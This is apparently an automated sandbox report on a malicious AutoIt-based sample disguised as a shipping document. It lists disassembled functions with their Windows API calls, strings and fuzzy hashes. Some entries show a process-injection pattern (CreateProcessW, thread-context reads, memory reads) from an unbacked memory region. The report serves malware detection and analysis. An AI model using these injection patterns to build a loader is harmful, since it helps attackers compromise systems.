Opcode Fuzzy Hash: 145df895558310dd2f7f0d00e23394dce1c0a15f6c43cf7ec266f2fe1296d05b
Instruction Fuzzy Hash: C6411D31248204B7DF741B789D0DBBD369AE745354F080125F612D66F2CBB19A91FFA1

Function 03527A48 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03527B19
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03527D3F

Memory Dump Source

Source File: 00000000.00000002.1880661294.0000000003525000.00000040.00000020.00020000.00000000.sdmp, Offset: 03525000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3525000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: bc006f1423d7638dae48eb9ad3c71f15e4bbcc7959843a6dae9439c037eba125
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 2BA13574E00219EBDB14CFA4D898BEEBBB5BF49304F208599E501BB2D1D7759A80CF94

Function 00092C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00092C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00092CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00091CAD,?), ref: 00092CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00091CAD,?), ref: 00092CCF

Strings

edit, xrefs: 00092CAC
AutoIt v3, xrefs: 00092C89, 00092C8E, 00092C8F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 3d5b4bbe76d23137fcfa728d7ad30a5ec4062750b5f9a6ffaf502937f88954cb
Instruction ID: b84c89bea5b6088541717b474c186e56fb1307db314cec0e731cfd18ff9c7b8d
Opcode Fuzzy Hash: 3d5b4bbe76d23137fcfa728d7ad30a5ec4062750b5f9a6ffaf502937f88954cb
Instruction Fuzzy Hash: 53F0FE755402907AEB711717AC08E7B3EBDE7CAF60F05005EFE01A3AA0C6B118D1EAB1

Function 03527818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03527708: Sleep.KERNELBASE(000001F4), ref: 03527719

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03527940

Strings

CIVSG522NAHHH6RZ1X7V, xrefs: 035279A3, 035279A6

Memory Dump Source

Source File: 00000000.00000002.1880661294.0000000003525000.00000040.00000020.00020000.00000000.sdmp, Offset: 03525000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3525000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateFileSleep
String ID: CIVSG522NAHHH6RZ1X7V
API String ID: 2694422964-2558541545
Opcode ID: 7461be44119074390a32cf047ca1b040f49a18882d91b5ab4a0bb12eda307dad
Instruction ID: 122575ea2d2ea2ad80b6957a16c0e80a82271888132c085515aa07cf64d981da
Opcode Fuzzy Hash: 7461be44119074390a32cf047ca1b040f49a18882d91b5ab4a0bb12eda307dad
Instruction Fuzzy Hash: BD51A430D04259DBEF11DBA4D855BEEBFB9AF09300F044599E608BB2C1D7BA0B44CB65

Function 00093B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00093B0F,SwapMouseButtons,00000004,?), ref: 00093B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00093B0F,SwapMouseButtons,00000004,?), ref: 00093B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00093B0F,SwapMouseButtons,00000004,?), ref: 00093B83

Strings

Control Panel\Mouse, xrefs: 00093B3E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 9b5a92f2b7261eb5f4886a03a23738269fd43eba7d3d514014068ad0c2ce7d73
Instruction ID: 835b761904c8d5a09de16c8a9b5ea7f1922113e71fb07ed6dacfab119fcef29e
Opcode Fuzzy Hash: 9b5a92f2b7261eb5f4886a03a23738269fd43eba7d3d514014068ad0c2ce7d73
Instruction Fuzzy Hash: 46112AB5510208FFDF608FA5DC44EAEB7BDEF44744B104459BA05D7210D3719E51ABA4

Function 03526708 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03526EC3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03526F59
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03526F7B

Memory Dump Source

Source File: 00000000.00000002.1880661294.0000000003525000.00000040.00000020.00020000.00000000.sdmp, Offset: 03525000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3525000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: 53b0fc9c00056b039df9c0d052695397f25cacfb13132febceb98b26a5358e55
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: 1B621A30A142589BEB24CBA4D840BDEB776FF59300F1091A9E10DEB3E5E7759E80CB59

Function 0009DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 000E32B7

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: abeab639687d4917843848bb9d2869737df2945d007baf677a291669e773f501
Instruction ID: 9723ad40d7229fff8a3afa82b27f83d041571943bf6debe697d3a346b8397165
Opcode Fuzzy Hash: abeab639687d4917843848bb9d2869737df2945d007baf677a291669e773f501
Instruction Fuzzy Hash: 2EC29D71A00245CFCF24CF98C884AADB7F1BF19300F248569E956AB3A2D775EE41DB91

Function 00093923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000D33A2

Part of subcall function 00096B57: _wcslen.LIBCMT ref: 00096B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00093A04

Strings

Line: , xrefs: 000D33EB

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 418dd6da00085f43793169627124b0012bb1bf23ca184552d87feac302ae95f0
Instruction ID: 67e7b04e7f3f345fb298993b156e49116237e92575fde5d03844730fd379b03a
Opcode Fuzzy Hash: 418dd6da00085f43793169627124b0012bb1bf23ca184552d87feac302ae95f0
Instruction Fuzzy Hash: 2F31A571408304AACB25EB10DC45BEFB7D8AB45720F04492EF59A93592DBB09749DBD2

Function 000AFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 000B0668

Part of subcall function 000B32A4: RaiseException.KERNEL32(?,?,?,000B068A,?,00161444,?,?,?,?,?,?,000B068A,00091129,00158738,00091129), ref: 000B3304

__CxxThrowException@8.LIBVCRUNTIME ref: 000B0685

Strings

Unknown exception, xrefs: 000B0692

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 48f1db22ef2d704a5bab6bf2e3025375c3f6ba0db4e306ce6ce34c077c4154ad
Instruction ID: 85c865f7fdd9da435c87ecf030e7fceffdc4325471d254c67e7f296da6e04c12
Opcode Fuzzy Hash: 48f1db22ef2d704a5bab6bf2e3025375c3f6ba0db4e306ce6ce34c077c4154ad
Instruction Fuzzy Hash: 47F0623490020DB7CF14B6E4DC46CEF77AD9F40750B604535B9249A5D3EF71EA69C681

Function 00117F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001182F5
TerminateProcess.KERNEL32(00000000), ref: 001182FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 001184DD

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 44d39e415e98635322c409cfe2e9f0a518b4f8b801606a0d568143b1a1325993
Instruction ID: 5728fafcf5ac4cbbb55c6120d9277f0f82e198e4f55466f4baddccae6f4fee2a
Opcode Fuzzy Hash: 44d39e415e98635322c409cfe2e9f0a518b4f8b801606a0d568143b1a1325993
Instruction Fuzzy Hash: 4E125E719083019FD714DF28C484BAABBE5BF85314F14896DF8998B292DB31ED85CF92

Function 000910F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00091BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00091BF4
Part of subcall function 00091BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00091BFC
Part of subcall function 00091BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00091C07
Part of subcall function 00091BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00091C12
Part of subcall function 00091BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00091C1A
Part of subcall function 00091BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00091C22

Part of subcall function 00091B4A: RegisterWindowMessageW.USER32(00000004,?,000912C4), ref: 00091BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0009136A
OleInitialize.OLE32 ref: 00091388
CloseHandle.KERNEL32(00000000,00000000), ref: 000D24AB

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: e7689162eb0693df87ec58a86a7e59e9a40793f09b281726241a7ae2725a6e9a
Instruction ID: 3ae12d91d42282464f17c2f4e419919bf04a39af768b246ed94193b63be701de
Opcode Fuzzy Hash: e7689162eb0693df87ec58a86a7e59e9a40793f09b281726241a7ae2725a6e9a
Instruction Fuzzy Hash: A071DFB5901300AEC784DF7AAD45699BAE5FB8A34435C822AD40BD7A72EBB044D1DF81

Function 000C86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,000C85CC,?,00158CC8,0000000C), ref: 000C8704
GetLastError.KERNEL32(?,000C85CC,?,00158CC8,0000000C), ref: 000C870E
__dosmaperr.LIBCMT ref: 000C8739

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 4da5cf6844d4b00c87a8f59610ad6641f0141a132a6518680aca6e7cd8ac3980
Instruction ID: 20a3cdf3aa96a1767ec463630025647e716c981a0d3924c4f642b4d9d3f132d5
Opcode Fuzzy Hash: 4da5cf6844d4b00c87a8f59610ad6641f0141a132a6518680aca6e7cd8ac3980
Instruction Fuzzy Hash: 32016B3660426026C2B063346C45FBF27894B81779F39421DF9049B1D3DEA0ECC18398

Function 000A1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 000A17F6

Strings

CALL, xrefs: 000A17C6

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: c59748081f16f1152fc7399efc87413f94981096dd832f329aedf9abbdcab59a
Instruction ID: ed4484eb5786bbf2527f7670462e3a00c672b994d450a0b569bc949824a70519
Opcode Fuzzy Hash: c59748081f16f1152fc7399efc87413f94981096dd832f329aedf9abbdcab59a
Instruction Fuzzy Hash: 2E229C70608741DFC724CF64D480AAABBF1BF9A354F14891DF4969B3A2D772E941CB82

Function 00092DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 000D2C8C

Part of subcall function 00093AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00093A97,?,?,00092E7F,?,?,?,00000000), ref: 00093AC2

Part of subcall function 00092DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00092DC4

Strings

X, xrefs: 000D2C5A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 2b78e5ab823275a34005d3ba887e16588c277f016247d800b793d1186865c0d4
Instruction ID: fb32eef9c5336da8e07ce68c0d94601883ad4bb0c29c487098856c3361ec26fb
Opcode Fuzzy Hash: 2b78e5ab823275a34005d3ba887e16588c277f016247d800b793d1186865c0d4
Instruction Fuzzy Hash: 7921D571A10258AFCF41EF94C845BEE7BF8AF48305F00405AE405BB342EBB45A899FA1

Function 00093837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00093908

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: fc92d47ffdddc7a286e15139acaa4437bae67988ef98f51db4a2da4e7730ac4f
Instruction ID: f5a034177407b2971bb6e64e2fb6f1ac0974626a0ac083b7f6c91b1850ba2950
Opcode Fuzzy Hash: fc92d47ffdddc7a286e15139acaa4437bae67988ef98f51db4a2da4e7730ac4f
Instruction Fuzzy Hash: C83191705043019FD760EF24D88579BBBE8FB49718F04092EF69A87741EBB1AA44DF92

Function 00095745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0009949C,?,00008000), ref: 00095773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0009949C,?,00008000), ref: 000D4052

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 424c523fd45fd48feb64e2f871c0e7123724025073f790a333fa23a4d0d3b35a
Instruction ID: e2656dbf0bdaecc84e463a7573fb78e008478d8b0e6f3e6c0e3ab739e19b873f
Opcode Fuzzy Hash: 424c523fd45fd48feb64e2f871c0e7123724025073f790a333fa23a4d0d3b35a
Instruction Fuzzy Hash: D2018030145325B6E7711A6ADC0EF9BBF98EF067B1F108201BA9C5A1E0C7B45955DB90

Function 0009B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0009BB4E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 15799598b80963b410e9922cceba29643fc64986de79a7d8d875f8c8f008663a
Instruction ID: 09c5e82db5ae0ecbddd17ba11374b4ff299c747e307bcccfe5ff927fcb7842f8
Opcode Fuzzy Hash: 15799598b80963b410e9922cceba29643fc64986de79a7d8d875f8c8f008663a
Instruction Fuzzy Hash: 5132BE30A00249DFDF24CF55D994ABEB7F9FF48320F148059E916AB291C7B4AE81DB91

Function 03526705 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03526EC3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03526F59
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03526F7B

Memory Dump Source

Source File: 00000000.00000002.1880661294.0000000003525000.00000040.00000020.00020000.00000000.sdmp, Offset: 03525000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3525000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: b650741246f1da570a0d80ac515a51a6d23cae255fe906b3cb722347e0dcc10c
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: 1F12EE24E14658C6EB24DF60D8507DEB232FF68300F1090E9910DEB7A5E77A4E81CB5A

Function 000AFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 000AFD1F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 4775d0687c2b5e25a1385efbb160d4368328cbb38f9a88114420b28a62e38809
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 21310474A0010ADBC769DFDAD580969FBA2FF4A310B2486A5E809CF656D731EDC1CBC0

Function 00094ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00094E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00094EDD,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094E9C
Part of subcall function 00094E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00094EAE
Part of subcall function 00094E90: FreeLibrary.KERNEL32(00000000,?,?,00094EDD,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094EFD

Part of subcall function 00094E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D3CDE,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094E62
Part of subcall function 00094E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00094E74
Part of subcall function 00094E59: FreeLibrary.KERNEL32(00000000,?,?,000D3CDE,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094E87

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
